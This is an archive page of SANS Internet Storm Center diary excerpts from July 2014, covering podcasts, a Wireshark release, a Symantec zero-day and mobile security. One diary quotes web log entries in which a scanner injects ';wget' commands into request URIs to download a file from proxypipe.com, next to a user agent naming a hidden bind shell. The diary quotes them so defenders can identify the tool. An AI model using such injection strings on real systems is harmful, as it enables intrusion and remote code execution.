Archive for the ‘SANS Internet Storm Center’ Category


ISC StormCast for Friday, August 1st 2014 http://isc.sans.edu/podcastdetail.html?id=4087, (Fri, Aug 1st)

(c) SANS Internet Storm Center.

WireShark 1.10.9 and 1.12.0 has been released, (Fri, Aug 1st)

Chris Mohan — Internet Storm Center Handler on Duty

A Honeypot for home: Raspberry Pi, (Thu, Jul 31st)

In numerous previous Diaries, my fellow Internet Storm Center Handlers have talked about honeypots, the value of full packet capture, and the value of sharing any attack data.

ISC StormCast for Thursday, July 31st 2014 http://isc.sans.edu/podcastdetail.html?id=4085, (Thu, Jul 31st)

Symantec Endpoint Protection Privilege Escalation Zero Day, (Wed, Jul 30th)

The people at Offensive Security have announced that, in the course of a penetration test for one of their customers, they found several vulnerabilities in the Symantec Endpoint Protection product. While details are limited, the vulnerabilities appear to permit privilege escalation to the SYSTEM user, which would give virtually unimpeded access to the system. Offensive Security has posted a video showing the exploitation of one of the vulnerabilities.

ISC StormCast for Wednesday, July 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4083, (Wed, Jul 30th)

ISC StormCast for Tuesday, July 29th 2014 http://isc.sans.edu/podcastdetail.html?id=4081, (Tue, Jul 29th)

Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th)

Our reader Robin submitted the following detect: I've got a site that was scanned this morning by a tool that left these entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day

The URL that appears to be retrieved does not exist, even though the domain does. In our own web logs, we have seen a couple of similar requests:

    162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
    162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
    162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day". There are a couple of other security-related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

ISC StormCast for Monday, July 28th 2014 http://isc.sans.edu/podcastdetail.html?id=4079, (Mon, Jul 28th)

Management and Control of Mobile Device Security, (Mon, Jul 28th)

When we talk about mobile devices, all boundaries are gone. Depending on where you work, it is likely that your mobile device (phone or tablet) has access to all the corporate data via wireless, in some cases with very few restrictions.
